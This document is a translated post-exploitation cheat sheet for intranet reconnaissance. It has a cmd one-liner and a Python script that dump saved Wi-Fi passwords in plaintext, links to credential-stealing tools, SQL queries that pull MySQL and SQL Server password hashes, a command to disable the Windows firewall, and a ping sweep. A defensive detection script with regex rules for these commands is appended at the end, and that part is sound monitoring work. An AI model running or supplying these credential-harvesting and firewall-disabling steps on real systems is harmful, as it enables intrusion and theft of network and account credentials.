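Supplementary notes on intranet information gathering
1. Retrieve the passwords of Wi-Fi networks the computer has connected to
1) cmd command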
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
2) Python script
# -*- coding: UTF-8 -*-
import os
import csv


# Get the name and password of every Wi-Fi network this computer has connected to
def checkWIFI():
    wifi_list = []
    # Get all Wi-Fi profile names
    message = os.popen('netsh wlan show profiles').readlines()
    print('正在解析中,请稍等……')
    for i in message:
        result = i.strip().encode().decode("utf-8")
        # The matched labels are what netsh prints on a Chinese-locale Windows
        if result.find(u"所有用户配置文件 : ") != -1:
            command = 'netsh wlan show profiles name="' + result[11:] + '" key=clear'
            try:
                per_wifi = os.popen(command).readlines()
            except OSError:
                per_wifi = []
            for j in per_wifi:
                passwd = j.strip().encode().decode("utf-8")
                if passwd.find(u"关键内容 :") != -1:
                    # Only keep entries whose password string is not empty
                    if passwd[18:] != '':
                        list_temp = []
                        list_temp.append(result[11:])
                        list_temp.append(passwd[18:])
                        wifi_list.append(list_temp)
    return wifi_list


if __name__ == "__main__":
    wifi_list = checkWIFI()
    print("返回结果如下:")
    # Create the output directory if it does not exist yet
    os.makedirs('./Result', exist_ok=True)
    filename = './Result/conWifiInfo.csv'
    with open(filename, 'w', encoding='utf-8', newline='') as q:
        csv_writer = csv.writer(q)
        csv_writer.writerow(['ID', 'wifi名称', '密码'])
        i = 0
        for j in wifi_list:
            i = i + 1
            print(str(i) + "、wifi名称:" + j[0] + ",密码:" + j[1])
            csv_writer.writerow([i, j[0], j[1]])
2. Retrieve account passwords stored in browsers
2.1 LaZagne
Collects all plaintext passwords on the target machine in one step
https://github.com/AlessandroZ/LaZagne
2.2 Dedicated tools
http://www.nirsoft.net/utils/web_browser_password.html Firefox browser
http://www.nirsoft.net/utils/chromepass.html Chrome browser
2.3 Python script
https://github.com/Potato-py/getIntrInfo
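3. Retrieve account passwords for 3389 (RDP) and Xshell connections
3.1 AsteriskPassword:
An asterisk password viewer; it can reveal the asterisk-masked passwords saved by Xshell, MySQL and other database tools
3.2 Xshell and Xftp password cracking: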
https://github.com/dzxs/Xdecrypt
4. Retrieve MySQL account passwords
Run the following statement in the mysql database, then decrypt the result
select Host,User,Password,authentication_string from mysql.user;
5. Retrieve SQL Server account passwords
SELECT name,password_hash FROM master.sys.sql_logins;
6. Firewall operations
1) View the firewall status
netsh firewall show config
2) Disable the firewall
netsh firewall set opmode mode=disable
7. ICMP scan for live hosts:
for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"
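
On the detection side, the commands in sections 1, 6 and 7 show up as process command lines in process-creation logging (for example Windows event 4688 with command-line auditing, or Sysmon event ID 1). The following is an added example, not part of the original notes, that flags them. The (host, command_line) event layout, the rule names, the sweep threshold and the sample hostnames are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Command-line patterns for the netsh commands shown in sections 1 and 6.
RULES = {
    "wifi_key_dump": re.compile(
        r"netsh(\.exe)?\s+wlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear", re.I),
    "firewall_disable": re.compile(
        r"netsh(\.exe)?\s+firewall\s+set\s+opmode\s+(mode\s*=\s*)?disable", re.I),
}
# First IPv4 address following a ping invocation (section 7).
PING = re.compile(r"\bping(\.exe)?\s+.*?(\d{1,3}(?:\.\d{1,3}){3})", re.I)
SWEEP_THRESHOLD = 20  # assumption: distinct ping targets per host in one window


def detect(events):
    """events: iterable of (host, command_line) from one time window.
    Returns a sorted list of (host, rule_name) findings."""
    hits = set()
    ping_targets = defaultdict(set)
    for host, cmd in events:
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits.add((host, name))
        m = PING.search(cmd)
        if m:
            ping_targets[host].add(m.group(2))
    # One ping is normal; many distinct targets from one host looks like a sweep.
    for host, targets in ping_targets.items():
        if len(targets) >= SWEEP_THRESHOLD:
            hits.add((host, "icmp_sweep"))
    return sorted(hits)


def sample_events():
    """Constructed sample events, not real logs."""
    events = [
        ("WS01", 'netsh wlan show profiles name="CorpWifi" key=clear'),
        ("WS01", "netsh  firewall set opmode mode=disable"),
        ("WS02", "netsh wlan show profiles"),   # no key=clear: not flagged
        ("WS02", "ping 10.0.0.1 -n 4"),         # single target: not flagged
    ]
    events += [("WS03", f"ping 192.168.1.{i} -w 1 -n 1") for i in range(1, 256)]
    return events


if __name__ == "__main__":
    for host, rule in detect(sample_events()):
        print(host, rule)
```

Listing Wi-Fi profiles without `key=clear` and pinging a single address are left unflagged on purpose, since both are routine administration.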